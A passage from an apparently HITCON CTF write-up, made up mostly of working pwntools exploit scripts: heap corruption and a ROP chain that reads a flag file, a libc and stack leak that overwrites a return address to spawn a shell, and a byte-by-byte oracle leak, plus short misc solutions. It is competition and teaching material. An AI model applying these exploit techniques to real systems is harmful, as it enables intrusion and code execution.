libc+<span class="hljs-number">0x26542</span>,<span class="hljs-number">0x3</span>,libc+<span class="hljs-number">0x26f9e</span>,heap,libc+<span class="hljs-number">0x12bda6</span>,<span class="hljs-number">0x100</span>,libc+<span class="hljs-number">0x47cf8</span>,<span class="hljs-number">0</span>,libc+<span class="hljs-number">0x00cf6c5</span>,
libc+<span class="hljs-number">0x26542</span>,<span class="hljs-number">0x1</span>,libc+<span class="hljs-number">0x26f9e</span>,heap,libc+<span class="hljs-number">0x12bda6</span>,<span class="hljs-number">0x100</span>,libc+<span class="hljs-number">0x47cf8</span>,<span class="hljs-number">1</span>,libc+<span class="hljs-number">0x00cf6c5</span>,
libc+<span class="hljs-number">0x36784</span>
))
buy(<span class="hljs-number">2</span>,<span class="hljs-number">0x210</span>,p64(<span class="hljs-number">0</span>)*<span class="hljs-number">0x20</span>+p64(libc+<span class="hljs-number">0x1e4c30</span>))
Super(p64(libc+<span class="hljs-number">0x0058373</span>)+<span class="hljs-string">"z"</span>*<span class="hljs-number">0x200</span>)
remove(<span class="hljs-number">1</span>)

buy(<span class="hljs-number">1</span>,heap+<span class="hljs-number">0xa80</span>,<span class="hljs-string">"a"</span>)

r.interactive()</code></pre><h3 id="one-punch-man"><a class="header-link" href="#one-punch-man"></a>One Punch Man</h3>
<pre class="hljs"><code>#!/usr/bin/env python
# -*- coding: utf-<span class="hljs-number">8</span> -*-
from pwn <span class="hljs-keyword">import</span> *
<span class="hljs-keyword">import</span> sys
<span class="hljs-keyword">import</span> <span class="hljs-built_in">time</span>
<span class="hljs-keyword">import</span> random
host = <span class="hljs-string">'52.198.120.1'</span>
port = <span class="hljs-number">48763</span>

binary = <span class="hljs-string">"./one_punch"</span>
context.binary = binary
elf = ELF(binary)
try:
  libc = ELF(<span class="hljs-string">"./libc.so.6"</span>)
  <span class="hljs-built_in">log</span>.success(<span class="hljs-string">"libc load success"</span>)
  system_off = libc.symbols.system
  <span class="hljs-built_in">log</span>.success(<span class="hljs-string">"system_off = "</span>+hex(system_off))
except:
  <span class="hljs-built_in">log</span>.failure(<span class="hljs-string">"libc not found !"</span>)

def <span class="hljs-keyword">name</span>(index, <span class="hljs-keyword">name</span>):
  r.recvuntil(<span class="hljs-string">"&gt; "</span>)
  r.sendline(<span class="hljs-string">"1"</span>)
  r.recvuntil(<span class="hljs-string">": "</span>)
  r.sendline(str(index))
  r.recvuntil(<span class="hljs-string">": "</span>)
  r.send(<span class="hljs-keyword">name</span>)
  pass

def rename(index,<span class="hljs-keyword">name</span>):
  r.recvuntil(<span class="hljs-string">"&gt; "</span>)
  r.sendline(<span class="hljs-string">"2"</span>)
  r.recvuntil(<span class="hljs-string">": "</span>)
  r.sendline(str(index))
  r.recvuntil(<span class="hljs-string">": "</span>)
  r.send(<span class="hljs-keyword">name</span>)

  pass

def d(index):
  r.recvuntil(<span class="hljs-string">"&gt; "</span>)
  r.sendline(<span class="hljs-string">"4"</span>)
  r.recvuntil(<span class="hljs-string">": "</span>)
  r.sendline(str(index))
  pass

def show(index):
  r.recvuntil(<span class="hljs-string">"&gt; "</span>)
  r.sendline(<span class="hljs-string">"3"</span>)
  r.recvuntil(<span class="hljs-string">": "</span>)
  r.sendline(str(index))

def magic(<span class="hljs-keyword">data</span>):
  r.recvuntil(<span class="hljs-string">"&gt; "</span>)
  r.sendline(str(<span class="hljs-number">0</span>xc388))
  <span class="hljs-built_in">time</span>.sleep(<span class="hljs-number">0.1</span>)
  r.send(<span class="hljs-keyword">data</span>)

<span class="hljs-keyword">if</span> len(sys.argv) == <span class="hljs-number">1</span>:
  r = process([binary, <span class="hljs-string">"0"</span>], env={<span class="hljs-string">"LD_LIBRARY_PATH"</span>:<span class="hljs-string">"."</span>})

<span class="hljs-keyword">else</span>:
  r = remote(host ,port)

<span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">'__main__'</span>:
  <span class="hljs-keyword">name</span>(<span class="hljs-number">0</span>,<span class="hljs-string">"A"</span>*<span class="hljs-number">0</span>x210)
  d(<span class="hljs-number">0</span>)
  <span class="hljs-keyword">name</span>(<span class="hljs-number">1</span>,<span class="hljs-string">"A"</span>*<span class="hljs-number">0</span>x210)
  d(<span class="hljs-number">1</span>)
  show(<span class="hljs-number">1</span>)
  r.recvuntil(<span class="hljs-string">" name: "</span>)
  heap = u64(r.recv(<span class="hljs-number">6</span>).ljust(<span class="hljs-number">8</span>,<span class="hljs-string">"\x00"</span>)) - <span class="hljs-number">0</span>x260
  print(<span class="hljs-string">"heap = {}"</span>.format(hex(heap)))
  <span class="hljs-keyword">for</span> i <span class="hljs-built_in">in</span> xrange(<span class="hljs-number">5</span>):
    <span class="hljs-keyword">name</span>(<span class="hljs-number">2</span>,<span class="hljs-string">"A"</span>*<span class="hljs-number">0</span>x210)
    d(<span class="hljs-number">2</span>)
  <span class="hljs-keyword">name</span>(<span class="hljs-number">0</span>,<span class="hljs-string">"A"</span>*<span class="hljs-number">0</span>x210)
  <span class="hljs-keyword">name</span>(<span class="hljs-number">1</span>,<span class="hljs-string">"A"</span>*<span class="hljs-number">0</span>x210)
  d(<span class="hljs-number">0</span>)
  show(<span class="hljs-number">0</span>)
  r.recvuntil(<span class="hljs-string">" name: "</span>)
  libc = u64(r.recv(<span class="hljs-number">6</span>).ljust(<span class="hljs-number">8</span>,<span class="hljs-string">"\x00"</span>)) - <span class="hljs-number">0</span>x1e4ca0
  print(<span class="hljs-string">"libc = {}"</span>.format(hex(libc)))
  d(<span class="hljs-number">1</span>)
  rename(<span class="hljs-number">2</span>,p64(libc + <span class="hljs-number">0</span>x1e4c30))

  <span class="hljs-keyword">name</span>(<span class="hljs-number">0</span>,<span class="hljs-string">"D"</span>*<span class="hljs-number">0</span>x90)
  d(<span class="hljs-number">0</span>)
  <span class="hljs-keyword">for</span> i <span class="hljs-built_in">in</span> xrange(<span class="hljs-number">7</span>):
    <span class="hljs-keyword">name</span>(<span class="hljs-number">0</span>,<span class="hljs-string">"D"</span>*<span class="hljs-number">0</span>x80)
    d(<span class="hljs-number">0</span>)
  <span class="hljs-keyword">for</span> i <span class="hljs-built_in">in</span> xrange(<span class="hljs-number">7</span>):
    <span class="hljs-keyword">name</span>(<span class="hljs-number">0</span>,<span class="hljs-string">"D"</span>*<span class="hljs-number">0</span>x200)
    d(<span class="hljs-number">0</span>)


  <span class="hljs-keyword">name</span>(<span class="hljs-number">0</span>,<span class="hljs-string">"D"</span>*<span class="hljs-number">0</span>x200)
  <span class="hljs-keyword">name</span>(<span class="hljs-number">1</span>,<span class="hljs-string">"A"</span>*<span class="hljs-number">0</span>x210)
  <span class="hljs-keyword">name</span>(<span class="hljs-number">2</span>,p64(<span class="hljs-number">0</span>x21)*(<span class="hljs-number">0</span>x90/<span class="hljs-number">8</span>))
  rename(<span class="hljs-number">2</span>,p64(<span class="hljs-number">0</span>x21)*(<span class="hljs-number">0</span>x90/<span class="hljs-number">8</span>))
  d(<span class="hljs-number">2</span>)
  <span class="hljs-keyword">name</span>(<span class="hljs-number">2</span>,p64(<span class="hljs-number">0</span>x21)*(<span class="hljs-number">0</span>x90/<span class="hljs-number">8</span>))
  rename(<span class="hljs-number">2</span>,p64(<span class="hljs-number">0</span>x21)*(<span class="hljs-number">0</span>x90/<span class="hljs-number">8</span>))
  d(<span class="hljs-number">2</span>)



  d(<span class="hljs-number">0</span>)
  d(<span class="hljs-number">1</span>)
  <span class="hljs-keyword">name</span>(<span class="hljs-number">0</span>,<span class="hljs-string">"A"</span>*<span class="hljs-number">0</span>x80)
  <span class="hljs-keyword">name</span>(<span class="hljs-number">1</span>,<span class="hljs-string">"A"</span>*<span class="hljs-number">0</span>x80)
  d(<span class="hljs-number">0</span>)
  d(<span class="hljs-number">1</span>)
  <span class="hljs-keyword">name</span>(<span class="hljs-number">0</span>,<span class="hljs-string">"A"</span>*<span class="hljs-number">0</span>x88 + p64(<span class="hljs-number">0</span>x421) + <span class="hljs-string">"D"</span>*<span class="hljs-number">0</span>x180 )
  <span class="hljs-keyword">name</span>(<span class="hljs-number">2</span>,<span class="hljs-string">"A"</span>*<span class="hljs-number">0</span>x200)
  d(<span class="hljs-number">1</span>)
  d(<span class="hljs-number">2</span>)
  <span class="hljs-keyword">name</span>(<span class="hljs-number">2</span>,<span class="hljs-string">"A"</span>*<span class="hljs-number">0</span>x200)
  rename(<span class="hljs-number">0</span>,<span class="hljs-string">"A"</span>*<span class="hljs-number">0</span>x88 + p64(<span class="hljs-number">0</span>x421) + p64(libc + <span class="hljs-number">0</span>x1e5090)*<span class="hljs-number">2</span> + p64(<span class="hljs-number">0</span>) + p64(heap+<span class="hljs-number">0</span>x10) )
  d(<span class="hljs-number">0</span>)
  d(<span class="hljs-number">2</span>)
  <span class="hljs-keyword">name</span>(<span class="hljs-number">0</span>,<span class="hljs-string">"/home/ctf/flag\x00\x00"</span> + <span class="hljs-string">"A"</span>*<span class="hljs-number">0</span>x1f0)
  magic(<span class="hljs-string">"A"</span>)
  add_rsp48 = libc + <span class="hljs-number">0</span>x000000000008cfd6
  pop_rdi = libc + <span class="hljs-number">0</span>x0000000000026542
  pop_rsi = libc + <span class="hljs-number">0</span>x0000000000026f9e
  pop_rdx = libc + <span class="hljs-number">0</span>x000000000012bda6
  pop_rax = libc + <span class="hljs-number">0</span>x0000000000047cf8
  syscall = libc + <span class="hljs-number">0</span>xcf6c5
  magic( p64(add_rsp48))
  <span class="hljs-keyword">name</span>(<span class="hljs-number">0</span>,p64(pop_rdi) + p64(heap + <span class="hljs-number">0</span>x24d0) + p64(pop_rsi) + p64(<span class="hljs-number">0</span>) + p64(pop_rax) + p64(<span class="hljs-number">2</span>) + p64(syscall) +
      p64(pop_rdi) + p64(<span class="hljs-number">3</span>) + p64(pop_rsi) + p64(heap) + p64(pop_rdx) + p64(<span class="hljs-number">0</span>x100) + p64(pop_rax) + p64(<span class="hljs-number">0</span>) + p64(syscall) +
      p64(pop_rdi) + p64(<span class="hljs-number">1</span>) + p64(pop_rsi) + p64(heap) + p64(pop_rdx) + p64(<span class="hljs-number">0</span>x100) + p64(pop_rax) + p64(<span class="hljs-number">1</span>) + p64(syscall)
      )
r.interactive()
</code></pre><h3 id="crypto-in-the-shell"><a class="header-link" href="#crypto-in-the-shell"></a>Crypto in the Shell</h3>
<pre class="hljs"><code>#!/usr/bin/env python
# -*- coding: utf-<span class="hljs-number">8</span> -*-
from Crypto.Cipher import AES
from pwn import *
import sys
import <span class="hljs-built_in">time</span>
import <span class="hljs-built_in">random</span>
host = '<span class="hljs-number">3.113</span>.219.89'
port = <span class="hljs-number">31337</span>

binary = <span class="hljs-string">"./chall"</span>
<span class="hljs-built_in">context</span>.binary = binary
elf = ELF(binary)
try:
  libc = ELF(<span class="hljs-string">"./libc.so.6"</span>)
  <span class="hljs-built_in">log</span>.success(<span class="hljs-string">"libc load success"</span>)
  system_off = libc.symbols.<span class="hljs-built_in">system</span>
  <span class="hljs-built_in">log</span>.success(<span class="hljs-string">"system_off = "</span>+hex(system_off))
except:
  <span class="hljs-built_in">log</span>.failure(<span class="hljs-string">"libc not found !"</span>)

def e(offset,size):
  r.recvuntil(<span class="hljs-string">"ffset:"</span>)
  r.sendline(str(offset))
  r.recvuntil(<span class="hljs-string">":"</span>)
  r.sendline(str(size))
  pass

<span class="hljs-keyword">if</span> len(sys.argv) == <span class="hljs-number">1</span>:
  r = process([binary, <span class="hljs-string">"0"</span>], env={<span class="hljs-string">"LD_LIBRARY_PATH"</span>:<span class="hljs-string">"."</span>})

<span class="hljs-keyword">else</span>:
  r = remote(host ,port)

<span class="hljs-keyword">if</span> __name__ == '__main__':
  e(-<span class="hljs-number">32</span>,<span class="hljs-number">15</span>) # overwirte <span class="hljs-built_in">key</span> &amp; <span class="hljs-built_in">get</span> <span class="hljs-built_in">key</span>
  <span class="hljs-built_in">key</span> = r.recv(<span class="hljs-number">16</span>)
  aes = AES.<span class="hljs-built_in">new</span>(<span class="hljs-built_in">key</span>, AES.MODE_CBC, <span class="hljs-string">"\x00"</span>*<span class="hljs-number">16</span>)

  e(-<span class="hljs-number">64</span>,<span class="hljs-number">15</span>) # leak libc
  <span class="hljs-built_in">sec</span> = r.recv(<span class="hljs-number">16</span>)
  data = aes.decrypt(<span class="hljs-built_in">sec</span>)
  libc = u64(data[:<span class="hljs-number">8</span>].ljust(<span class="hljs-number">8</span>,<span class="hljs-string">"\x00"</span>)) - <span class="hljs-number">0x3ec680</span>
  <span class="hljs-built_in">print</span>(<span class="hljs-string">"libc = {}"</span>.format(hex(libc)))
  e(-<span class="hljs-number">928</span>,<span class="hljs-number">15</span>) # leak code
  <span class="hljs-built_in">sec</span> = r.recv(<span class="hljs-number">16</span>)
  aes = AES.<span class="hljs-built_in">new</span>(<span class="hljs-built_in">key</span>, AES.MODE_CBC, <span class="hljs-string">"\x00"</span>*<span class="hljs-number">16</span>)
  data = aes.decrypt(<span class="hljs-built_in">sec</span>)
  <span class="hljs-built_in">print</span> repr(data)
  code = u64(data[<span class="hljs-number">8</span>:].ljust(<span class="hljs-number">8</span>,<span class="hljs-string">"\x00"</span>)) - <span class="hljs-number">8</span> + <span class="hljs-number">0x3A0</span>
  <span class="hljs-built_in">print</span>(<span class="hljs-string">"code = {}"</span>.format(hex(code)))
  env_ptr = libc + <span class="hljs-number">0x3ee098</span>
  e(env_ptr - code, <span class="hljs-number">15</span>) # leak stack
  <span class="hljs-built_in">sec</span> = r.recv(<span class="hljs-number">16</span>)
  aes = AES.<span class="hljs-built_in">new</span>(<span class="hljs-built_in">key</span>, AES.MODE_CBC, <span class="hljs-string">"\x00"</span>*<span class="hljs-number">16</span>)
  data = aes.decrypt(<span class="hljs-built_in">sec</span>)
  <span class="hljs-built_in">print</span> repr(data)
  #stack = u64(data[:<span class="hljs-number">8</span>].ljust(<span class="hljs-number">8</span>,<span class="hljs-string">"\x00"</span>)) # <span class="hljs-built_in">local</span>
  stack = u64(data[:<span class="hljs-number">8</span>].ljust(<span class="hljs-number">8</span>,<span class="hljs-string">"\x00"</span>)) + <span class="hljs-number">8</span>  # remote
  <span class="hljs-built_in">print</span>(<span class="hljs-string">"stack = {}"</span>.format(hex(stack)))
  wanto = stack - <span class="hljs-number">0x130</span>
  e(wanto-code,<span class="hljs-number">1</span>) # overwrite loop i (bypass <span class="hljs-number">32</span> <span class="hljs-built_in">round</span>)

  magic = p64(libc + <span class="hljs-number">0x4f2c5</span>)

  <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">xrange</span>(<span class="hljs-number">8</span>): # modify retrun address to one_gadget
    <span class="hljs-built_in">print</span> i
    wanto = stack - <span class="hljs-number">0xf8</span> + i
    e(wanto-code,<span class="hljs-number">1</span>)
    <span class="hljs-built_in">sec</span> = r.recv(<span class="hljs-number">16</span>)
    j=<span class="hljs-number">0</span>
    <span class="hljs-keyword">while</span> <span class="hljs-number">1</span>:
      aes = AES.<span class="hljs-built_in">new</span>(<span class="hljs-built_in">key</span>, AES.MODE_CBC, <span class="hljs-string">"\x00"</span>*<span class="hljs-number">16</span>)
      <span class="hljs-built_in">sec</span> = aes.encrypt(<span class="hljs-built_in">sec</span>)
      j+=<span class="hljs-number">1</span>
      <span class="hljs-keyword">if</span> <span class="hljs-built_in">sec</span>[<span class="hljs-number">0</span>] == magic[i]:
        <span class="hljs-keyword">for</span> k <span class="hljs-keyword">in</span> <span class="hljs-built_in">xrange</span>(j):
          r.sendline(str(wanto-code))
          r.sendline(str(<span class="hljs-number">1</span>))
        <span class="hljs-keyword">for</span> k <span class="hljs-keyword">in</span> <span class="hljs-built_in">xrange</span>(j):
          r.recvuntil(<span class="hljs-string">"ffset:"</span>)
        <span class="hljs-built_in">break</span>
  <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">xrange</span>(<span class="hljs-number">8</span>): # modify envrion ptr to null
    <span class="hljs-built_in">print</span> i
    wanto = env_ptr + i
    e(wanto-code,<span class="hljs-number">1</span>)
    <span class="hljs-built_in">sec</span> = r.recv(<span class="hljs-number">16</span>)
    j=<span class="hljs-number">0</span>
    <span class="hljs-keyword">while</span> <span class="hljs-number">1</span>:
      aes = AES.<span class="hljs-built_in">new</span>(<span class="hljs-built_in">key</span>, AES.MODE_CBC, <span class="hljs-string">"\x00"</span>*<span class="hljs-number">16</span>)
      <span class="hljs-built_in">sec</span> = aes.encrypt(<span class="hljs-built_in">sec</span>)
      j+=<span class="hljs-number">1</span>
      <span class="hljs-keyword">if</span> <span class="hljs-built_in">sec</span>[<span class="hljs-number">0</span>] == '\x00':
        <span class="hljs-keyword">for</span> k <span class="hljs-keyword">in</span> <span class="hljs-built_in">xrange</span>(j):
          r.sendline(str(wanto-code))
          r.sendline(str(<span class="hljs-number">1</span>))
        <span class="hljs-keyword">for</span> k <span class="hljs-keyword">in</span> <span class="hljs-built_in">xrange</span>(j):
          r.recvuntil(<span class="hljs-string">"ffset:"</span>)
        <span class="hljs-built_in">break</span>
  r.sendline(<span class="hljs-string">"l"</span>) # exit main
  r.sendline(<span class="hljs-string">"ls"</span>) # <span class="hljs-built_in">get</span> shell
  r.interactive()
</code></pre><h2 id="misc"><a class="header-link" href="#misc"></a>Misc</h2>
<h3 id="revenge-of-welcome"><a class="header-link" href="#revenge-of-welcome"></a>Revenge of Welcome</h3>
<p>The challenge is to escape vim easy mode</p>
<p><code>&lt;C-l&gt;:q!</code>
<code>&lt;C-o&gt;:q!</code></p>
<p>flag : <code>hitcon{accidentally enter vim -y and can&#39;t leave Q_Q}</code></p>
<h3 id="ev3-player"><a class="header-link" href="#ev3-player"></a>EV3 Player</h3>
<p>Use wireshark to open the pklg file.</p>
<p>And install this plugin in wireshark.
<a href="https://github.com/ev3dev/lms-hacker-tools/tree/master/EV3">https://github.com/ev3dev/lms-hacker-tools/tree/master/EV3</a></p>
<p>You would see these rsf file in the pklg.</p>
<pre class="hljs"><code>..<span class="hljs-regexp">/prjs/</span>SD_Card<span class="hljs-regexp">/project/</span>fl.rsf
..<span class="hljs-regexp">/prjs/</span>SD_Card<span class="hljs-regexp">/project/</span>ag.rsf</code></pre><p>Extract these two rsf from the pklg(I complete this step manually)</p>
<p>Install the LEGO Mindstorms to open the rsf sound file.</p>
<p><a href="https://education.lego.com/en-us/downloads/mindstorms-ev3/software">https://education.lego.com/en-us/downloads/mindstorms-ev3/software</a></p>
<p class="img-container"><img src="https://i.imgur.com/hstSAQH.png" alt=""></p>
<p>And you can hear the flag:</p>
<p><code>hitcon{playsoundwithlegomindstormsrobot}</code></p>
<h3 id="hexdump"><a class="header-link" href="#hexdump"></a>heXDump</h3>
<pre class="hljs"><code>IO.popen(<span class="hljs-string">"xxd -r -ps - <span class="hljs-subst">#{@file}</span>"</span>, <span class="hljs-string">'r+'</span>) <span class="hljs-keyword">do</span> <span class="hljs-params">|f|</span>
    f.puts data
    f.close_write
  <span class="hljs-keyword">end</span></code></pre><p>xxd didn&#39;t clear the original data, we can leak the flag one byte by one byte.</p>
<pre class="hljs"><code><span class="hljs-comment">#!/usr/bin/env python3</span>
<span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *
<span class="hljs-keyword">import</span> string

context.log_level = <span class="hljs-string">'CRITICAL'</span>

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">cmd</span><span class="hljs-params">(x, data = None)</span>:</span>
    <span class="hljs-keyword">global</span> r

    <span class="hljs-keyword">while</span> <span class="hljs-keyword">True</span>:
        <span class="hljs-keyword">try</span>:
            r.sendlineafter(<span class="hljs-string">'0) quit\n'</span>, str(x))
            <span class="hljs-keyword">if</span> x == <span class="hljs-number">1</span> <span class="hljs-keyword">and</span> data:
                r.sendlineafter(<span class="hljs-string">'Data? (In hex format)\n'</span>, data.hex())
            <span class="hljs-keyword">elif</span> x == <span class="hljs-number">2</span>:
                <span class="hljs-keyword">return</span> r.recvline().strip()
            <span class="hljs-keyword">elif</span> x == <span class="hljs-number">3</span> <span class="hljs-keyword">and</span> data:
                r.sendlineafter(<span class="hljs-string">'- AES\n'</span>, data)
            <span class="hljs-keyword">return</span>
        <span class="hljs-keyword">except</span> EOFError:
            r = remote(<span class="hljs-string">'13.113.205.160'</span>, <span class="hljs-number">21700</span>)
            mode(<span class="hljs-string">'aes'</span>)
            copyflag()

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">read</span><span class="hljs-params">()</span>:</span>
    <span class="hljs-keyword">return</span> cmd(<span class="hljs-number">2</span>)

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">write</span><span class="hljs-params">(data)</span>:</span>
    cmd(<span class="hljs-number">1</span>, data)

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">mode</span><span class="hljs-params">(data)</span>:</span>
    cmd(<span class="hljs-number">3</span>, data)

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">copyflag</span><span class="hljs-params">()</span>:</span>
    cmd(<span class="hljs-number">1337</span>)

r = remote(<span class="hljs-string">'13.113.205.160'</span>, <span class="hljs-number">21700</span>)
mode(<span class="hljs-string">'aes'</span>)
copyflag()

flag = <span class="hljs-string">b''</span>

<span class="hljs-keyword">for</span> block <span class="hljs-keyword">in</span> range(<span class="hljs-number">2</span>):
    checks = [read()]
    <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> range(<span class="hljs-number">1</span>, <span class="hljs-number">16</span>):
        write(<span class="hljs-string">b'\x00'</span> * <span class="hljs-number">16</span> * block + <span class="hljs-string">b'\x00'</span> * i)
        checks += [read()]

    leak = <span class="hljs-string">b''</span>
    <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> range(<span class="hljs-number">15</span>, <span class="hljs-number">-1</span>, <span class="hljs-number">-1</span>):
        <span class="hljs-comment">#for j in range(256):</span>
        <span class="hljs-keyword">for</span> j <span class="hljs-keyword">in</span> string.printable:
            write(<span class="hljs-string">b'\x00'</span> * <span class="hljs-number">16</span> * block + <span class="hljs-string">b'\x00'</span> * i + bytes([ord(j)]) + leak[::<span class="hljs-number">-1</span>])
            <span class="hljs-keyword">if</span> read() == checks[i]:
                leak += bytes([ord(j)])
                print(leak)
                <span class="hljs-keyword">break</span>

    flag += leak[::<span class="hljs-number">-1</span>]

print(flag)</code></pre><p>flag : <code>hitcon{xxd?XDD!e45dc4df7d0b79}</code></p>
<h3 id="emojivm"><a class="header-link" href="#emojivm"></a>EmojiVM</h3>
<p>I created a simple assembler with this reversed opcode table:</p>
<pre class="hljs"><code><span class="hljs-attribute">1  🈳</span>: nop
<span class="hljs-attribute">2  ➕</span>: +
<span class="hljs-attribute">3  ➖</span>: -
<span class="hljs-attribute">4  ❌</span>: *
<span class="hljs-attribute">5  ❓</span>: %
<span class="hljs-attribute">6  ❎</span>: ^
<span class="hljs-attribute">7  👫</span>: &amp;
<span class="hljs-attribute">8  💀</span>: &lt;
<span class="hljs-attribute">9  💯</span>: ==
<span class="hljs-attribute">10 🚀</span>: jmp
<span class="hljs-attribute">11 🈶</span>: jmp if true
<span class="hljs-attribute">12 🈚</span>: jmp if false
<span class="hljs-attribute">13 ⏬</span>: push back
<span class="hljs-attribute">14 🔝</span>: pop top
<span class="hljs-attribute">15 📤</span>: load?
<span class="hljs-attribute">16 📥</span>: store?
<span class="hljs-attribute">17 🆕</span>: malloc (at most 10) [size, malloc(size)]
<span class="hljs-attribute">18 🆓</span>: free
<span class="hljs-attribute">19 📄</span>: read
<span class="hljs-attribute">20 📝</span>: write
<span class="hljs-attribute">21 🔡</span>: write until nullbyte
<span class="hljs-attribute">22 🔢</span>: cout
<span class="hljs-attribute">23 🛑</span>: exit

<span class="hljs-attribute">1 ~ 10
😀😁😂🤣😜😄😅😆😉😊😍</span></code></pre><pre class="hljs"><code><span class="hljs-keyword">import</span> re
<span class="hljs-keyword">import</span> sys


opmap = {
    <span class="hljs-string">'nop'</span>:   <span class="hljs-string">'\U0001f233'</span>,
    <span class="hljs-string">'add'</span>:   <span class="hljs-string">'\U00002795'</span>,
    <span class="hljs-string">'sub'</span>:   <span class="hljs-string">'\U00002796'</span>,
    <span class="hljs-string">'mul'</span>:   <span class="hljs-string">'\U0000274c'</span>,
    <span class="hljs-string">'mod'</span>:   <span class="hljs-string">'\U00002753'</span>,
    <span class="hljs-string">'pow'</span>:   <span class="hljs-string">'\U0000274e'</span>,
    <span class="hljs-string">'and'</span>:   <span class="hljs-string">'\U0001f46b'</span>,
    <span class="hljs-string">'lt'</span>:    <span class="hljs-string">'\U0001f480'</span>,
    <span class="hljs-string">'eq'</span>:    <span class="hljs-string">'\U0001f4af'</span>,
    <span class="hljs-string">'jmp'</span>:   <span class="hljs-string">'\U0001f680'</span>,
    <span class="hljs-string">'jt'</span>:    <span class="hljs-string">'\U0001f236'</span>,
    <span class="hljs-string">'jf'</span>:    <span class="hljs-string">'\U0001f21a'</span>,
    <span class="hljs-string">'push'</span>:  <span class="hljs-string">'\U000023ec'</span>,
    <span class="hljs-string">'pop'</span>:   <span class="hljs-string">'\U0001f51d'</span>,
    <span class="hljs-string">'load'</span>:  <span class="hljs-string">'\U0001f4e4'</span>,
    <span class="hljs-string">'store'</span>: <span class="hljs-string">'\U0001f4e5'</span>,
    <span class="hljs-string">'alloc'</span>: <span class="hljs-string">'\U0001f195'</span>,
    <span class="hljs-string">'free'</span>:  <span class="hljs-string">'\U0001f193'</span>,
    <span class="hljs-string">'read'</span>:  <span class="hljs-string">'\U0001f4c4'</span>,
    <span class="hljs-string">'write'</span>: <span class="hljs-string">'\U0001f4dd'</span>,
    <span class="hljs-string">'puts'</span>:  <span class="hljs-string">'\U0001f521'</span>,
    <span class="hljs-string">'puti'</span>:  <span class="hljs-string">'\U0001f522'</span>,
    <span class="hljs-string">'exit'</span>:  <span class="hljs-string">'\U0001f6d1'</span>,
}

valmap = [
    <span class="hljs-string">'\U0001f600'</span>,
    <span class="hljs-string">'\U0001f601'</span>,
    <span class="hljs-string">'\U0001f602'</span>,
    <span class="hljs-string">'\U0001f923'</span>,
    <span class="hljs-string">'\U0001f61c'</span>,
    <span class="hljs-string">'\U0001f604'</span>,
    <span class="hljs-string">'\U0001f605'</span>,
    <span class="hljs-string">'\U0001f606'</span>,
    <span class="hljs-string">'\U0001f609'</span>,
    <span class="hljs-string">'\U0001f60a'</span>,
    <span class="hljs-string">'\U0001f60d'</span>,
]


<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">push</span><span class="hljs-params">(n)</span>:</span>
    pc = <span class="hljs-number">0</span>
    <span class="hljs-keyword">if</span> n &lt; <span class="hljs-number">0</span>:
        <span class="hljs-keyword">raise</span> NotImplementedError(<span class="hljs-string">'QAQ'</span>)
    <span class="hljs-keyword">if</span> n &lt; <span class="hljs-number">10</span>:
        <span class="hljs-keyword">return</span> opmap[<span class="hljs-string">'push'</span>] + valmap[int(n)], <span class="hljs-number">2</span>
    ns = list(str(n).strip(<span class="hljs-string">'L'</span>))
    ret = opmap[<span class="hljs-string">'push'</span>] + valmap[int(ns.pop(<span class="hljs-number">0</span>))]
    pc += <span class="hljs-number">2</span>
    <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> ns:
        ret += opmap[<span class="hljs-string">'push'</span>] + valmap[<span class="hljs-number">10</span>]
        pc += <span class="hljs-number">2</span>
        ret += opmap[<span class="hljs-string">'mul'</span>]
        pc += <span class="hljs-number">1</span>
        ret += opmap[<span class="hljs-string">'push'</span>] + valmap[int(i)]
        pc += <span class="hljs-number">2</span>
        ret += opmap[<span class="hljs-string">'add'</span>]
        pc += <span class="hljs-number">1</span>
    <span class="hljs-keyword">return</span> ret, pc


out = []
<span class="hljs-keyword">with</span> open(sys.argv[<span class="hljs-number">1</span>]) <span class="hljs-keyword">as</span> f:
    data = f.read()

data = re.sub(<span class="hljs-string">r';[^\n]*'</span>, <span class="hljs-string">''</span>, data)
data = re.sub(<span class="hljs-string">r'[ \t]+'</span>, <span class="hljs-string">' '</span>, data)

labels = {}
pc = <span class="hljs-number">0</span>

<span class="hljs-keyword">for</span> line <span class="hljs-keyword">in</span> data.splitlines():
    line = line.strip()
    <span class="hljs-keyword">if</span> line == <span class="hljs-string">''</span>:
        <span class="hljs-keyword">continue</span>

    print(<span class="hljs-string">'debug: '</span>, line)
    <span class="hljs-keyword">if</span> line.endswith(<span class="hljs-string">':'</span>):
        labels[line[:<span class="hljs-number">-1</span>]] = pc
        <span class="hljs-keyword">continue</span>

    op, *args = line.split(<span class="hljs-string">' '</span>)
    <span class="hljs-keyword">if</span> op <span class="hljs-keyword">not</span> <span class="hljs-keyword">in</span> opmap:
        print(<span class="hljs-string">'Invalid op %s'</span> % op, file=sys.stderr)
        exit(<span class="hljs-number">1</span>)

    <span class="hljs-keyword">for</span> arg <span class="hljs-keyword">in</span> args[::<span class="hljs-number">-1</span>]:
        arg = arg.strip()
        <span class="hljs-keyword">try</span>:
            arg = int(arg, <span class="hljs-number">0</span>)
        <span class="hljs-keyword">except</span> ValueError:
            out.append(<span class="hljs-string">'label_'</span> + arg)
            pc += <span class="hljs-number">20</span>
        <span class="hljs-keyword">else</span>:
            code, pc_off = push(arg)
            out.append(code)
            pc += pc_off
        <span class="hljs-keyword">continue</span>

    <span class="hljs-keyword">if</span> op != <span class="hljs-string">'push'</span>:
        out.append(opmap[op])
        pc += <span class="hljs-number">1</span>

print(out)

<span class="hljs-keyword">for</span> i, e <span class="hljs-keyword">in</span> enumerate(out):
    <span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> e.startswith(<span class="hljs-string">'label_'</span>):
        <span class="hljs-keyword">continue</span>
    e = e[<span class="hljs-number">6</span>:]
